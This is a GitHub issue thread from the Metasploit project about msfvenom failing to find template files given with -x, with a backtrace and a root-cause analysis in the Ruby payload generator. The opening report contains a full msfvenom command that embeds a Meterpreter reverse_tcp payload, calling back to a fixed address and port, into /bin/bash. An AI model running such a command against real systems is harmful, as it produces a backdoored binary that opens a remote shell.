### ISSUE TITLE
msfvenom fails to find files with -x

### ISSUE THREAD

**Issue by jlee-r7** [rapid7/metasploit-framework#6213]
```
$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.2.243.21 LPORT=4315 -x /bin/bash -k -f elf > /tmp/foo
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 71 bytes
Error: No such file or directory @ rb_file_s_size - bash
```

Originally reported here: https://community.rapid7.com/thread/7919

**Comment by wchen-r7** [comment]
I reproduced the issue too, a backtrace:

```
[11/11/2015 12:56:33] [e(0)] core: Errno::ENOENT : No such file or directory @ rb_file_s_size - bash
/home/sinn3r/.rvm/gems/ruby-2.1.7@metasploit-framework/gems/metasm-1.0.2/metasm/os/main.rb:283:in `size'
/home/sinn3r/.rvm/gems/ruby-2.1.7@metasploit-framework/gems/metasm-1.0.2/metasm/os/main.rb:283:in `read'
/home/sinn3r/.rvm/gems/ruby-2.1.7@metasploit-framework/gems/metasm-1.0.2/metasm/exe_format/main.rb:35:in `load_file'
/home/sinn3r/.rvm/gems/ruby-2.1.7@metasploit-framework/gems/metasm-1.0.2/metasm/exe_format/main.rb:42:in `decode_file'
/home/sinn3r/metasploit-framework/lib/msf/util/exe.rb:1000:in `to_linux_x86_elf'
/home/sinn3r/metasploit-framework/lib/msf/util/exe.rb:2137:in `to_executable_fmt'
/home/sinn3r/metasploit-framework/lib/msf/core/payload_generator.rb:272:in `format_payload'
/home/sinn3r/metasploit-framework/lib/msf/core/payload_generator.rb:317:in `generate_payload'
./msfvenom:344:in `<main>'
```

**Comment by wchen-r7** [comment]
Root cause:

It starts with the def exe_options method in PayloadGenerator:

```ruby
    def exe_options
      opts = { inject: keep }
      unless template.blank?
        opts[:template_path] = File.dirname(template)
        opts[:template]      = File.basename(template)
      end
      opts
    end
```

The hash from exe_options is passed to to_executable_fmt. So this means if a payload is being generated as an executable, :template by default is just the name of the file, not the fullname.

At some point, :template gets converted to a fullname, looks like always done by set_template_default in Msf::Util::EXE. Some methods call this, some don't. Those that don't but still uses :template should hit this bug.

**Comment by wchen-r7** [comment]
So I have only found one method that has this bug: ```to_linux_x86_elf```. And I'll just fix that one. All the other methods are calling set_template_default.
